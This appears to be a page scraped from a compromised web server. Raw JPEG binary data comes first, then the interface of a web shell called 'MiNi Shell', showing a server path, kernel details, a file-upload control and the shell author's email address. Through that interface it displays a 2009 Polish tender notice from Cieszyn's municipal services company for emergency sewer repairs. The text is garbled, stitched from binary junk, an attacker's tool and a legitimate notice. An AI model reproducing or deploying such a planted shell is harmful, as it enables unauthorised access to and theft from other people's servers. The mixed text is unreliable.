JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090327/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090327/81386-N-2009.html

<p class="kh_header"><b>Cieszyn: Wykonywanie awaryjnych remontów sieci kanalizacji sanitarnej i ogólnospławnej</b><br>
<b>Numer ogłoszenia: 81386 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej w Cieszynie , ul. Słowicza 59, 43-400 Cieszyn, woj. śląskie, tel. 033 4794100, faks 033 4794113.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zgk.cieszyn.bip-gov.info.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.zgk.cieszyn.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład budżetowy gminnej jednostki samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie awaryjnych remontów sieci kanalizacji sanitarnej i ogólnospławnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest niezwłoczne (po telefonicznym przekazaniu zlecenia) wykonanie awaryjnych remontów i robót budowlanych na wskazanych elementach lub częściach zewnętrznych sieci kanalizacji sanitarnej i ogólnospławnej nadzorowanych przez zamawiającego. Rozpoczęcie wykonywania remontów powinno nastąpić w ciągu 24 godzin od przekazania informacji wykonawcy o awarii - niezależnie od dnia tygodnia (np. w niedzielę). Roboty będą realizowane w całości sprzętem i pracownikami wykonawcy, z materiałów kupowanych przez wykonawcę i przy pełnym nadzorze wykonawcy obejmującym wszystkie elementy zarządu (np. obsługa geodezyjna, zajęcie pasa drogowego).
Przewidywana, szacunkowa liczba zlecanych robót w okresie najbliższych dwóch lat to 28 sztuk. Szacunkowa średnia wartość jednego remontu to 10 tys. zł brutto. Wartość całego dwuletniego kontraktu została oszacowana na 280 tys. zł brutto.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Przystępujący do postępowania o udzielenie zamówienia publicznego ogłoszonego przez ZGK w Cieszynie powinni spełniać warunki wymienione w art. 22 ust. 1 ustawy oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy. Wykonawcy, którzy naruszają te warunki zostaną wykluczeni z tego postępowania.  
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - to jest mają odpowiednie wpisy w rejestrze KRS albo w ewidencji działalności gospodarczej świadczące o prowadzeniu działalności zgodnej ze specyfiką niniejszego przedmiotu zamówienia. 
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, to jest dysponują:
a)  doświadczeniem:
Jako że specyfika przedmiotu zamówienia w niniejszym postępowaniu nie pozwala precyzyjnie określić jakiego rodzaju roboty, w jakim zakresie i jakiej wartości będą zlecane wykonawcy, zamawiający przyjął, że przystępujący do postępowania wykonawcy muszą się wykazać doświadczeniem w robotach remontowych równych (lub większych) robotom wykonanym przy usuwaniu następującej przykładowej (ale bardzo zbliżonej do rzeczywistej) awarii sieci kanalizacji ogólnospławnej:
Została wymieniona część sieci kanalizacyjnej z rur betonowych na rury plastikowe O 400 mm, o długości 20 m, na głębokości od 1,5 do 3,1 m, jedna studzienka została wyremontowana, druga została odtworzona od nowa. Dla usunięcia tej awarii było konieczne przejście przez pas drogowy, co wiązało się z czasowym zabezpieczeniem nowej organizacji ruchu pojazdów i pieszych, oraz wejście na dwie prywatne posesje, co wiązało się z przywróceniem terenu robót do stanu pierwotnego. Całość została wykonana w przeciągu dwóch tygodni. Wartość tego awaryjnego remontu kanalizacji została wyceniona (razem z materiałami, kosztami sprzętu i obsługą geodezyjną) na 30 tys. zł brutto.
Aby zamawiający mógł ocenić doświadczenie wykonawcy za wystarczające, musi się on wykazać przeprowadzeniem co najmniej trzech robót remontowych o rodzaju i zakresie podobnym do powyższego a wartości co najmniej jak wyżej (każda robota). Ewentualnie może się wykazać co najmniej dwoma robotami remontowymi plus dwoma robotami inwestycyjnymi o rodzaju i zakresie podobnym do powyższego a wartości co najmniej jak wyżej (każda robota).
Roboty te powinny być wykonane w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności firmy jest krótszy - w tym okresie. Należy podać przedmiot robót, ich wartość, daty i miejsca wykonania. Należy dołączyć także dokumenty potwierdzające, że roboty te zostały wykonane należycie - podpisane przez zleceniodawców.
b)  sprzętem (minimum po jednym egzemplarzu):
- koparka, 
- koparko-ładowarka,
- minikoparka,
- samochód ciężarowy,
- urządzenie do zagęszczania wykopów,
- piła do cięcia asfaltu i betonu,
- znaki drogowe oraz inne zabezpieczenia dla zapewnienia właściwego ruchu drogowego podczas 
prowadzonych robót.
c)  pracownikami o kwalifikacjach:
- przynajmniej jeden pracownik oferenta ma spełniać wymogi kierownika budowy określone w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z p.zm.);
- przynajmniej jeden pracownik oferenta uczestniczący w robotach winien posiadać uprawnienia budowlane w specjalności instalacyjno-inżynieryjnej w zakresie sieci sanitarnych, obejmujące sieci wodociągowe, kanalizacyjne, gazowe i ciepłownicze;
- przynajmniej jeden pracownik uczestniczący w robotach winien posiadać uprawnienia drogowe;
- przynajmniej jeden pracownik oferenta uczestniczący w robotach powinien mieć uprawnienia operatora koparki. 
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - w tym zakresie zamawiający wymaga jedynie potwierdzenia, że wykonawca jest ubezpieczony od odpowiedzialności cywilno-prawnej w zakresie prowadzonej przez siebie działalności gospodarczej lub przynajmniej w zakresie przedmiotu zamówienia. Okres ubezpieczenia powinien obejmować co najmniej czas od złożenia oferty do końca bieżącego roku.
4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia - wykonawcy potwierdzą ten warunek w oświadczeniu złożonym na druku dołączonym do SIWZ.  
Dla poświadczenia spełniania powyższych warunków wykonawcy winni złożyć oświadczenia i dokumenty wymienione w punkcie 5.A SIWZ - w jednej kopercie razem z ofertą. Ocena spełnienia warunków zostanie dokonana zgodnie z formułą: spełnia - nie spełnia. Z treści tych dokumentów musi wynikać jednoznacznie, iż warunki te wykonawca spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> punkt 5.A SIWZ
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22, ust. 1 ustawy. 
  Ma to być podpisany przez wykonawcę druk oświadczenia, który został dołączony do SIWZ.
2)   Oświadczenie o nie podleganiu wykluczeniu z postępowania, zgodnie z art. 24, ust. 1 ustawy. 
      Ma to być podpisany przez wykonawcę druk oświadczenia, który został dołączony do SIWZ.
3) Aktualny odpis z właściwego rejestru KRS albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej. Za aktualny zamawiający uznaje dokument, który wystawiono w okresie sześciu miesięcy poprzedzających termin składania ofert w niniejszym zamówieniu. W oryginale lub czytelnej kopii poświadczonej za zgodność przez wykonawcę.
4) Wykaz wykonanych lub wykonywanych robót budowlanych (minimum trzech remontowych lub dwóch remontowych i  dwóch inwestycyjnych) - odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, a konkretnie, to by każda z tych robót była porównywalna lub większa od przykładowej roboty opisanej w pkt. 4.2.a. SIWZ  - w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności firmy jest krótszy - w tym okresie) - z podaniem ich wartości, przedmiotu, dat wykonywania i miejsca wykonywania - na formularzu dołączonym do SIWZ. Do formularza należy dołączyć dokumenty potwierdzające, że usługi, o których mowa w formularzu zostały wykonane należycie - podpisane przez zleceniodawców. Referencje należy dołączyć w oryginale lub w czytelnej kopii poświadczonej za zgodność przez wykonawcę.
5) Wykaz niezbędnego do wykonania zamówienia sprzętu i obiektów. Razem z kopiami dokumentów potwierdzającymi posiadanie lub dzierżawienie sprzętu i obiektów (dowody rejestracyjne, umowy, zezwolenia, atesty, itp.). Wykaz na formularzu dołączonym do SIWZ plus czytelne kopie dokumentów potwierdzających poświadczone za zgodność przez wykonawcę.
6) Wykaz osób wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia - niezbędnych do wykonania zamówienia, a także zakresy wykonywanych przez nich czynności. Wykaz na formularzu dołączonym do SIWZ. Dołączyć należy także kopie dokumentów poświadczających posiadane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich dokumentów - potwierdzone za zgodność z oryginałem przez wykonawcę.
7) Polisa lub inny dokument ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilno-prawnej w zakresie prowadzonej przez siebie działalności gospodarczej lub przynajmniej w zakresie przedmiotu zamówienia. Ma to być czytelna kopia poświadczona za zgodność przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.zgk.cieszyn.bip-gov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej w Cieszynie
ul. Słowicza 59
43-400 Cieszyn
pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 11:30, miejsce: Zakład Gospodarki Komunalnej w Cieszynie
ul. Słowicza 59
43-400 Cieszyn
pokój nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com